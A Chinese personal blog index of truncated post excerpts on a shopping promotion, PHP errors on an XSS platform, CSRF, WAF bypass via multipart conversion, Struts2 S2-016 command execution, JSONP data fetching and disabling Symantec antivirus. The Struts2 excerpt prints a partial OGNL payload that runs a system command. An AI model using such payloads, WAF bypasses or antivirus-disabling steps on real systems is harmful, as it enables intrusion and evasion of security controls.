双11 薅”苏宁”羊毛 来晚就没喽

双11 薅”苏宁”羊毛 来晚就没喽
双11 苏宁 薅羊毛 攻略 首先进入活动地址:https://sale.suning.com/jr/lcd11lqbpc/index.html 然后找到下面点击一下【学习理财知识】如下图,一定要点击一下呦。 学习理财小知识 然后在回到上方,点击【立即领取】,如下图: 点击领取 然后会跳转到你苏宁的充值界面,这个是往“零钱宝”里面冲钱,类似于支付宝里面的“余额宝”,往里面冲100元钱,最少要冲100喔,不要有任何担...

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given 解决方法–解决方案

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given  解决方法–解决方案
今天在用php7.0版本的时候,XSS平台报错,如下: Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in 出错代码如下: 1 2 3 4 5 $this->queryId=mysqli_query($this->linkId,$sql); while($row=mysqli_fetch_assoc($this->queryId)){ $this->rows[]=$row; } $this->...

CSRF 跨站请求伪造 攻击与防御 — CSRF防御策略

CSRF 跨站请求伪造 攻击与防御  —  CSRF防御策略
看过程能让你更了解如何的安全编码,看文中红字结果让你知道防范措施。 什么是CSRF 跨站请求伪造 CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 那么CSRF到底能够干嘛呢?你可以这样简单的理解:攻击者可以盗用你的登陆信息,以你的身份模拟发送各种请求。攻击者只要借助少许的社会工程学...

密码保护:Post、Get数据包转为上传multipart/form-data格式数据包php脚本

密码保护:Post、Get数据包转为上传multipart/form-data格式数据包php脚本
Post、Get数据包转为上传multipart/form-data格式数据包php脚本 说一下写这个工具的初衷吧。有很多时候某些程序接收参数的方式都是通用的,那咱们就可以利用这种方式来绕过WAF等验证来进行攻击。 只需要转换一下格式即可。 在线转换地址:http://gdd.gd/multipart.php Burp Post、Get数据包在线转换工具 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 2...

密码保护:另类执行Struts2命令 及 SQL注入

密码保护:另类执行Struts2命令 及 SQL注入
先说一下Struts2 2013 S2-016的测试payload代码是如下的。 GET /xxxxxxx/rf/userAction!login.action?redirect:$%7B%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%...

JSONP 跨域请求数据代码(跨域请求数据包)

JSONP 跨域请求数据代码(跨域请求数据包)
同事非想看,没办法弄一段代码给对方展示JSONP跨域请求,只要把下面的代码保存到本地,然后打开就可以获取到JSONP的信息。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN&qu...

密码保护:域名对应负责人查询系统 php查询脚本

密码保护:域名对应负责人查询系统 php查询脚本
唉,本来工作可以简单,但是就因为都不想干导致很多地方难做,没办法为了自己工作省事,把两步或者三步需要解决的东西合并为一步即可解决。通过如下脚本喽。效果如下图: 域名对应负责人查询系统 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58...

密码保护:关闭Symantec Endpoint Protection企业赛门铁克杀毒 还能保持联网

密码保护:关闭Symantec Endpoint Protection企业赛门铁克杀毒 还能保持联网
赛门铁克杀毒软件企业版 这里必须要啰嗦两句废话,因为我的博客有文章缩略提取,所以很多内容会被提取出来看到。 说说自己为什么会这么做吧,主要是本人的工作需要用到很多软件,而很多软件都是那种会被杀毒软件查杀的,但是公司还不给我们这个部门一些绿色通道。真的,服服的,没办法。。。唉。。 这个也是但是同事发现然后告诉我的。首先你需要有改动注册表的权限。 第一...